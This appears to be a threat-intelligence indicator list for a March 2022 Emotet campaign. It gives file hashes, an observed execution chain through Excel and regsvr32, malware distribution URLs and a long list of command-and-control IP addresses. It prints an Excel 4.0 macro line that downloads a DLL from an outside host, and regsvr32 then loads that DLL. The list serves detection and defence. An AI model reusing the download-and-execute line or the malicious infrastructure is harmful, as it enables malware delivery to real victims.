e5_emotet_31.03.2022.txt
Emotet 2022 | epoch5 | 31.03.2022 |
************************************************************************************************************
.zip D7892019D6AECFCB5AEE7EA2B634C0B3D331A06183F29B3FE8764AE316B28D81
.xls 51f83bb615894e11bc64c975d619b723cffe7ff4f99448025b3e4da4f3f84db4
.dll 7cdbaea2cd14e415e58f5dbcb2a0865b81a630fa0058339cb19efd6d91652e00
************************************************************************************************************
Exec >>
EXCEL.EXE C:\Users\Admin\AppData\Local\Temp\so 3103.xlsm
C:\Windows\SysWow64\regsvr32.exe -s ..\xewn.dll
C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Topvzrjhq\nwgkp.pkh"
************************************************************************************************************
.dll distribution URLs
https://www.doh-designsection.com/Files/LXZv9wBqLH/
http://draheimdesign.com/allyears_jdrf_video/DZEUcZ5/
http://dunyaaslan.com/cgi-bin/IwvOXl/
https://www.centurypapers.com/database-wordpres/VDYOi/
http://fontecmobile.com/pk/tRqU7/
http://dusangerzicgera.com/img/4v7QHP/
https://www.doh-designsection.com/Files/LXZv9wBqLH/
http://draheimdesign.com/allyears_jdrf_video/DZEUcZ5/
http://fontecmobile.com/pk/tRqU7/
http://dunyaaslan.com/cgi-bin/IwvOXl/
http://dusangerzicgera.com/img/4v7QHP/
http://www.centurypapers.com/database-wordpres/VDYOi/
************************************************************************************************************
.zip 7006A1D713D4E369C588EEF3F1ED0999DE768FF86F7CC36EDACD45FB29BAA32F
.xls 4883af21678508f6a3e631248a45f711eb168847ff3534a977e57fdc844c4133
.dll ea28624ff2644d6bbafea9df6c5def9bd8a32851edb071dec0b21fb9556958ac
************************************************************************************************************
Exec >>
EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\archivo_3103.xls"
=CALL("urlmon", "URLDownloadToFileA", "JCCB", 0, "https://fffcatfriends.org/adoptables/XN3HjwHemz1AaIw/", "..\alnu.dll")
C:\Windows\SysWow64\regsvr32.exe -s ..\alnu.dll
C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Vnxmfi\ufhamdkh.kkn"
************************************************************************************************************
.dll distribution URLs
http://pancook.com/newsite/tbK/
http://fhdllp.com/wp-admin/DWAEc5bkS93/
http://la-csi.com/mt-admin/gCObckGgJyOJWJLZ/
http://hology.ub.ac.id/admin/8haN/
https://fffcatfriends.org/adoptables/XN3HjwHemz1AaIw/
http://filmmogzivota.rs/js/aHOJNRvJFgK4g/
C2 servers (IP:port)
5.189.160.61:443
94.177.178.26:8080
202.29.239.162:443
54.38.143.246:7080
119.59.125.140:8080
185.148.168.15:8080
188.166.229.148:443
2.58.16.87:8080
104.131.62.48:8080
103.82.248.59:7080
37.59.209.141:8080
103.133.214.242:8080
195.77.239.39:8080
128.199.192.135:8080
78.47.204.80:443
59.148.253.194:443
87.106.97.83:7080
45.71.195.104:8080
85.214.67.203:8080
139.196.72.155:8080
210.57.209.142:8080
194.9.172.107:8080
116.124.128.206:8080
118.98.72.86:443
203.153.216.46:443
202.28.34.99:8080
54.37.228.122:443
202.134.4.210:7080
88.217.172.165:8080
196.44.98.190:8080
195.154.146.35:443
217.182.143.207:443
36.67.23.59:443
207.148.81.119:8080
190.90.233.66:443
66.42.57.149:443
85.25.120.45:8080
93.104.209.107:8080
68.183.93.250:443
103.42.58.120:7080
5.56.132.177:8080
159.69.237.188:443
51.68.141.164:8080
54.37.106.167:8080
198.199.98.78:8080
54.38.242.185:443
62.171.178.147:8080
37.44.244.177:8080
103.41.204.169:8080
78.46.73.125:443
185.148.168.220:8080
191.252.103.16:80
175.126.176.79:8080